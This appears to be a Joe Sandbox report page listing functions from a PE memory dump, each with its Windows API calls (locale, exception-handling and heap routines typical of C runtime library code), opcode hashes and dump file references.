Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: c40a4254a20ebd6d35bbee373fcc85eb6215540467412d7d115de5608df417c4
Instruction ID: 7dd8eddcca5b825621b0fc48398e3a36791daf10ee2764b1586bca49074c8a0c
Opcode Fuzzy Hash: c40a4254a20ebd6d35bbee373fcc85eb6215540467412d7d115de5608df417c4
Instruction Fuzzy Hash: 2451A072A01205AFDB20DFA5DC41BFE73B8BF28740F054469E918E7191E7709AC5CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A19EE5 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

GetACP.KERNEL32(?,?,?,?,?,?,00A0FBFB,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A19FA6
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A0FBFB,?,?,?,00000055,?,-00000050,?,?), ref: 00A19FD1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A1A134

Strings

utf8, xrefs: 00A1A0A3

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 8a3b6f7e6e740fffc63a3053c14778b0fad54de2e24603232d677392583a9256
Instruction ID: 20f5c057ed46920c727980f53990f692dc7cbf6f24950aa5170f078902b1c9ae
Opcode Fuzzy Hash: 8a3b6f7e6e740fffc63a3053c14778b0fad54de2e24603232d677392583a9256
Instruction Fuzzy Hash: 8471F272601206BADB24AB74CD52BFB73A8EF59740F14446AF606D7181EB70EDC2C762

Uniqueness

Uniqueness Score: -1.00%

Function 00A06E56 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A06E62
IsDebuggerPresent.KERNEL32 ref: 00A06F2E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A06F47
UnhandledExceptionFilter.KERNEL32(?), ref: 00A06F51

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4a07b03eae5818062de844083ec60b615a6b152a0c7dcb6e99ffd47c3ed6d8b8
Instruction ID: 2eb5d3fc3903918a37036c87b0499b41f08b2715cd997f593c19b5429157fcbe
Opcode Fuzzy Hash: 4a07b03eae5818062de844083ec60b615a6b152a0c7dcb6e99ffd47c3ed6d8b8
Instruction Fuzzy Hash: B331E575D0531D9ADF21DFA4E9497CDBBB8AF08300F1041AAE50CAB291EB719A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A2F8 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A34C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A396
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A45C

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 96ef445e79ae80ddd630d0a1997a6b47c8f4b2d4806dd322e8872687ba49fc4c
Instruction ID: 745869e0eac2bf388674dc942c562ffc9229f812353197449a38e22c7f70cd9d
Opcode Fuzzy Hash: 96ef445e79ae80ddd630d0a1997a6b47c8f4b2d4806dd322e8872687ba49fc4c
Instruction Fuzzy Hash: FD61BD759012079FDB289F24DD86BFAB3B9EF24310F10816AE906C6285F774DAD1CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B916 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A0BA0E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A0BA18
UnhandledExceptionFilter.KERNEL32(00A011D4,?,?,?,?,?,00000000), ref: 00A0BA25

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: adb336ace5e1963a056d0dc9650a9b13ad1035b1378785f9cb697b8e6af8a5e5
Instruction ID: e02671f217e64384c4e50b25841aebf2401c9e4d487a1e6105b9da66504dd96b
Opcode Fuzzy Hash: adb336ace5e1963a056d0dc9650a9b13ad1035b1378785f9cb697b8e6af8a5e5
Instruction Fuzzy Hash: 5A31B37491121C9BCB21DF64D989BDDBBB8BF08710F5041EAE81CA72A1E7709F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00A45B87 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 761COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 00A45C5F

Part of subcall function 00A42388: __call_reportfault.LIBCMT ref: 00A42395

Strings

T, xrefs: 00A45D30

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: __call_reportfault__invoke_watson
String ID: T
API String ID: 3340580077-3187964512
Opcode ID: db0833b12c69802265dfdc8630987a7878d7349af451cae304aaa84fa9003980
Instruction ID: 98dffee49667786da67c4bcfabb5c6655622c975468a4071f613c95b27b2816e
Opcode Fuzzy Hash: db0833b12c69802265dfdc8630987a7878d7349af451cae304aaa84fa9003980
Instruction Fuzzy Hash: A352837AE0065ACFDF24CFA8C4813EEB7B1FF95300F54816AD815AB242E7749A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A16294 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00A1628F,?,?,?,?,?,?,00000000), ref: 00A164C1

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3b69f7b500e5d4b3154b99496ad2eb62083af1972d25a55bf37edc06c52b9c80
Instruction ID: 5204764ebadc04d567a84178a7bc65ad121e1dd7570e7b369dc1d4b78c4ba4fa
Opcode Fuzzy Hash: 3b69f7b500e5d4b3154b99496ad2eb62083af1972d25a55bf37edc06c52b9c80
Instruction Fuzzy Hash: 22B14B35610608CFD718CF2CC586BA57BA1FF45364F298698E8EACF2A1C335E991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A17331 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3de3d01801f259064517d9d73f3785fe02ed67eb55d44723f82b7acd105287
Instruction ID: a277da2b3e774691ceb2e3277981bff359bd11ca03b173b28a47e24f763c3355
Opcode Fuzzy Hash: 2c3de3d01801f259064517d9d73f3785fe02ed67eb55d44723f82b7acd105287
Instruction Fuzzy Hash: 7E4192B580821DAFDB20DF79CC89AEEBBB9AF45300F1442D9E41DD3241DA359E858F50

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A54B Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A59F

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 6f1001d243bd3c765e84b2fdc31b52f271764fd2b596d5fab0ae178ab94085cc
Instruction ID: f0463794363ddea81e2d87fa3a29891ad83863d6ce865b056b908a6407004396
Opcode Fuzzy Hash: 6f1001d243bd3c765e84b2fdc31b52f271764fd2b596d5fab0ae178ab94085cc
Instruction Fuzzy Hash: 4B21B036606206ABDB28AB64DD41AFB73A8EF54314F14407AFD01D6181FB349D81CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A1D2 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

EnumSystemLocalesW.KERNEL32(00A1A2F8,00000001,00000000,?,-00000050,?,00A1A929,00000000,?,?,?,00000055,?), ref: 00A1A244

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2f1a9bae5fd334ea35e8a80d6be783996adf9170e4e44d3b2a725868b8a4c71c
Instruction ID: 38103e999f79b22c2da5b7e22bb356c042164c3d3ab0a4a4b1931ae0334baa8e
Opcode Fuzzy Hash: 2f1a9bae5fd334ea35e8a80d6be783996adf9170e4e44d3b2a725868b8a4c71c
Instruction Fuzzy Hash: FA11253A2013015FDB28AF78C8916FAB791FF94769B14852CE94687A50E372A983CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A77A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A1A5F5,00000000,00000000,?), ref: 00A1A7A6

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9d2967134290c1cf04369f938d41c21156b955abeb9358d7ae212f3f9d9b999d
Instruction ID: 26f788be00cf3a66d051e8e9abc434327a00659a43968fa45112c1a09698b347
Opcode Fuzzy Hash: 9d2967134290c1cf04369f938d41c21156b955abeb9358d7ae212f3f9d9b999d
Instruction Fuzzy Hash: 9AF0F436601112AFDF289B608C45BFA77B8EB507A4F144429EC06E31C0EA34FF82C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A0E0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A1A134

Strings

utf8, xrefs: 00A1A0A3

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 83d2087403138c75d7e8cfc4be54d7da7de7e62d2020c05d05c4405acfc794ad
Instruction ID: 25ed256d76517e65dc61e2a0a47033f12f9302e4b129ce77b540bce73abda994
Opcode Fuzzy Hash: 83d2087403138c75d7e8cfc4be54d7da7de7e62d2020c05d05c4405acfc794ad
Instruction Fuzzy Hash: B2F02232601109ABC714EBB8DD46EFA33ECDB48765F00417AFA02D7281EA38AD468B50

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A26D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

EnumSystemLocalesW.KERNEL32(00A1A54B,00000001,?,?,-00000050,?,00A1A8ED,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00A1A2B7

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e9b000b751fb79ea06ec38197222e92a4b7505d25f98715c5e27d20963c8d4d9
Instruction ID: bf67de1f2b1aaaf8f8e698a491618e7d831688a8e41eb056c0f9cbb50f86b803
Opcode Fuzzy Hash: e9b000b751fb79ea06ec38197222e92a4b7505d25f98715c5e27d20963c8d4d9
Instruction Fuzzy Hash: 67F0F6362013045FDB145F75D881AFA7BD1EF81768B15882CFA464B6A0D6729C82C750

Uniqueness

Uniqueness Score: -1.00%

Function 00A11AC2 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A0BC64: EnterCriticalSection.KERNEL32(-00A2A7C0,?,00A10BF6,00000000,00A278E0,0000000C,00A10BBD,00000000,?,00A122C0,00000000,?,00A11968,00000001,00000364,00000000), ref: 00A0BC73

EnumSystemLocalesW.KERNEL32(00A11AB5,00000001,00A279E0,0000000C,00A11EE4,00000000), ref: 00A11AFA

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f1ec76283cb2cd7ac305b716a2dec28c569cc3a7229832bd077e537d527ab75e
Instruction ID: 5d6bfc0e3dc45be1b22af4cfe0c461c8bb8c9f1000135bc04cb0323d4083b5e1
Opcode Fuzzy Hash: f1ec76283cb2cd7ac305b716a2dec28c569cc3a7229832bd077e537d527ab75e
Instruction Fuzzy Hash: CEF04936A14204EFD710EFA8E942B9D77F0FB08720F10422AF5109B2E1DBB55942CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A187 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

EnumSystemLocalesW.KERNEL32(00A1A0E0,00000001,?,?,?,00A1A94B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A1A1BE

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ec1139b41f59152cf48501a7a3c96e87fbd4ea177bbb2e8cd08f7fed71b03279
Instruction ID: a9f169c15ab12abdd2762a738810a6abd4b6bae35eecde91314c2c6dcbd1c7fb
Opcode Fuzzy Hash: ec1139b41f59152cf48501a7a3c96e87fbd4ea177bbb2e8cd08f7fed71b03279
Instruction Fuzzy Hash: 22F0E53A34020567CB15AF75D8557EA7F95EFC17A0F068458EA058B291D6719883C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A11FE8 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00A10761,?,20001004,00000000,00000002,?,?,00A0FD63), ref: 00A1201C

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 1d8b7cd73cd41bde41cff6852bbdcc184f246c5cf23a1990af8f8c821ef54655
Instruction ID: 0a43546dba595d521a2c518116186f177458b663a3a79d197e635f33faefad44
Opcode Fuzzy Hash: 1d8b7cd73cd41bde41cff6852bbdcc184f246c5cf23a1990af8f8c821ef54655
Instruction Fuzzy Hash: E3E01A31500168BBCF126FA1DC04ADE7A6AEF48760F008521FD0566121DB31CDA2AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A06FB2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006FBE,00A06622), ref: 00A06FB7

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 17472d9b63a66a6c5f044559e039a255fb51814418074b5ce22a856fd76a06c6
Instruction ID: 542f76f4b06e8f3cb6c9a7f84b9bdc2fa3e80660682da8d06aaf07c00a927b8f
Opcode Fuzzy Hash: 17472d9b63a66a6c5f044559e039a255fb51814418074b5ce22a856fd76a06c6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AAAB Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00A1AAAB

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

